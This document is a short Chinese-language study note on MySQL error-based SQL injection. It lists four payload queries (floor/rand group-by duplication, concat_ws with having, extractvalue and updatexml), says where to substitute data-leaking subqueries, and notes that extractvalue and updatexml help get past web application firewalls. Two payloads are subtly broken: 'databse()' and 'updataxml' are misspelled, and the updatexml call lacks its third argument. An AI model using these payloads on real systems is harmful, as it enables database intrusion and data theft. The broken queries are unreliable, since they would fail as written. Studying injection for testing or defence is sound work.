==========================第一次总结尝试==============================
首先放一下测试的表
第一条报错注入语句:
select password from sql_test where username = 'admin' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
concat内为具体报错语句
第二条报错注入语句:
select * from sql_test where id = 1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1;
version处替换成报错语句
第三条报错语句
select * from sql_test where id = 1 and extractvalue(1,concat(0x5c,databse()));
database处换成报错语句
第四条报错语句
select * from sql_test where id = 1 and updataxml(1,concat(0x5c,databse()));
database处换成报错语句
顺便提一句updataxml和extractvalue可以用于注入的时候进行绕过waf,用法找sql文档看一下吧
报错语句替换,最核心的还是concat()函数